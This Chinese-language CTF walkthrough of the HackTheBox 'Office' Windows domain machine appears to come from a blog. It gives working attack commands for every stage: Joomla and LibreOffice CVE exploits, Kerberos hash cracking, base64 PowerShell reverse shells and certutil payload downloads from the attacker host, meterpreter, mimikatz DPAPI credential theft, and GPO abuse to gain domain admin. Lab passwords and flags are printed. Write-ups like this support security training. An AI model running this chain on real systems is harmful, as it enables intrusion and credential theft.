Main
$ nmap -sC -sV 10.10.11.3 --min-rate 1000
CMS:joomla# echo '10.10.11.3 office.htb DC.office.htb'>>/etc/hosts
在扫描报告中,可以看到robots.txt目录泄露
http://10.10.11.3/administrator/index.php
根据CVE-2023-23752存在未授权访问
http://10.10.11.3/api/index.php/v1/config/application?public=true
很可惜这并不是web后台登录密码
username:root
password:H0lOgrams4reTakIng0Ver754!
Kerbrute
-
Kerbrute是一款用于渗透测试和红队操作的开源工具,专门用于暴力破解Kerberos协议。Kerberos是一种网络身份验证协议,通常用于Windows活动目录环境中,用于实现单点登录和安全身份验证。
-
用户枚举:Kerbrute可以通过暴力破解Kerberos预身份验证(Pre-Authentication)来枚举有效用户帐户。这有助于发现目标系统上存在的有效用户。
-
密码爆破:它可以尝试使用暴力破解技术猜解用户的密码,从而获取对目标系统的访问权限。Kerbrute支持使用字典和组合字典进行密码爆破攻击。
-
票据传递(Pass-the-Ticket)攻击:Kerbrute可以捕获有效用户的Kerberos票据,并尝试利用这些票据进行票据传递攻击,从而获取对其他系统的访问权限。
-
模块化设计:它采用模块化设计,允许用户自定义和扩展其功能,以满足不同的渗透测试需求。
$ sudo apt install golang-go
$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
$ chmod 777 kerbrute_linux_amd64
$ ./kerbrute_linux_amd64 userenum --dc DC.office.htb -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o recore.log
$ grep -oP '\S+(?=@office\.htb)' recore.log | sort | uniq >Users.txt
尝试枚举用户
crackmapexec
-
CrackMapExec(CME)是一款用于渗透测试和红队行动的开源工具,用于自动化利用Windows活动目录(Active Directory)网络的渗透测试和攻击。它提供了一系列功能,包括:
-
用户认证和信息收集:CME可以通过多种方式(例如SMB、LDAP、RDP等)对Windows主机进行身份验证,并收集关于用户、组、计算机等对象的信息。
-
漏洞利用:CME可以利用已知的Windows漏洞,如SMB中的MS08-067、MS17-010等,从而获取对目标系统的访问权限。
-
会话管理:它可以建立、管理和操纵用户会话,执行命令并在目标系统上执行各种操作。
内网渗透:CME可以在Windows活动目录环境中执行各种内网渗透技术,如Pass-the-Hash(PTH)、Pass-the-Ticket(PTT)等,以获取更高的权限。
模块化框架:它是一个模块化的工具,允许用户自定义和扩展其功能,使其能够适应不同的渗透测试需求。
$ crackmapexec smb 10.10.11.3 -u Users.txt -p 'H0lOgrams4reTakIng0Ver754!' --shares
我们得知dwolfe用户可以使用服务器的SMB共享资源
$ smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!
smb: \> get Latest-System-Dump-8fbc124d.pcap ./Main.pacap
https://www.bilibili.com/video/BV1uf421D7Sm/
我可以看到在加密部分etype指定为AES256加密,cipher密文
复制密文a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
https://hashcat.net/wiki/doku.php?id=example_hashes
我们需要构建完整的解密结构
公式:$krb5pa$18$(USERNAME)$(DC_Server)$(Cipher)
etype选择18
使用用户tstark
解密密文结构:$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
保存到hash
$ hashcat -m 19900 hash /usr/share/wordlists/rockyou.txt
username:tstark
password:playboy69
尝试用这个密码登录web后台管理员administrator
这里的主机是windows,所以需要反弹powershell
https://www.revshells.com/exec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA");
[kali]$ wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
``$ python3 -m http.server 80
[靶机]> cd c:\\Users\Public\Downloads
> certutil -urlcache -split -f http://10.10.16.15/RunasCs.exe RunasCs.exe
> .\RunasCs.exe tstark playboy69 powershell -r 10.10.16.15:10033
User Flag
> type c:\\Users\tstark\Desktop\user.txt
50a96aa18344772ec1c10135ff5141d8
Root Flag
[靶机]
(tstark)> netstat -avn
(tstark)> cd C:\Users\Public\Downloads
(tstark)> certutil -urlcache -split -f http://10.10.16.15/chisel.exe chisel.exe
(tstark)> .\chisel.exe client 10.10.16.15:5564 R:8083:127.0.0.1:8083
[kali]$ chisel server --port 5564 --reverse
kali访问http://127.0.0.1:8083
在Submit Application页面是一个简历申请表,存在一处文件上传
这里利用 LibreOffice漏洞CVE-2023-2255
[Kali]
$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\reverse.exe' --output 'exploit.odt'
再使用msfvenom生成稳定的会话
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.15 LPORT=10035 -f exe -o reverse.exe
$ msfconsole -x 'use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.15;set LPORT 10035;run'
[靶机]> cd C:\Users\Public\
> certutil -urlcache -split -f http://10.10.16.15/reverse.exe reverse.exe
再将exploit.odt上传到个人简历
差不多等个3分钟左右...
[靶机]
进入powershell(ppotts) PS> cd C:\Users\Public\Downloads
(ppotts) PS> Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
定位的凭据文件
(ppotts) PS> Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
定位主键
主密钥(master key)是一个加密的对称密钥,可以用来解密其他内容。因此,提取加密的主密钥是很有意义的,因为这样可以后续解密使用该主密钥加密的其他内容。(ppotts) PS> certutil -urlcache -split -f http://10.10.16.15/mimikatz.exe mimikatz.exe
(ppotts) PS> .\mimikatz.exe
mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
获取主钥
dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
使用evil-winrm连接主机
[kali]$ vim /etc/proxychains4.conf
$ chisel server -p 9002 --reverse --socks5
[靶机](ppotts) PS> cd C:\Users\Public\Downloads
(ppotts) PS> .\chisel.exe client 10.10.16.15:9002 R:socks
[kali]username:HHogan
password:H4ppyFtW183#
我们是无法直接访问目标端口9002,所以需要通过代理来绕过
下载https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe
-
SharpGPOAbuse 是一种用于利用 Windows 环境中的 Group Policy Objects (GPOs) 的工具。GPOs 是 Windows 中用于配置计算机和用户操作环境的策略设置。通过 GPOs,系统管理员可以定义许多安全策略、网络设置、应用程序设置等。
-
SharpGPOAbuse 允许攻击者在合法的 Active Directory 环境中执行恶意代码,通过修改或滥用 GPOs 实现权限提升、执行代码、横向移动等攻击。它可以用于在目标系统上执行各种恶意操作,例如启动远程 shell、添加新用户、获取 NTLM hash 等。
[kali]$ wget https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe
[靶机]*Evil-WinRM* PS C:\Users\HHogan\Documents> cd ../
*Evil-WinRM* PS C:\Users\HHogan\Documents> certutil -urlcache -split -f http://10.10.16.15/SharpGPOAbuse.exe SharpGPOAbuse.exe
添加为管理员,并且刷新配置
*Evil-WinRM* PS C:\Users\HHogan\> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "<C>" --GPOName "Default Domain Controllers Policy"
*Evil-WinRM* PS C:\Users\HHogan\> gpupdate /force"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --GPOName "Default Domain Controllers Policy" --Force
PS C:\Windows\system32> type c:\\Users\Administrator\Desktop\root.txt
5224918ae4a25196417ca0a559a084e6
文献:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)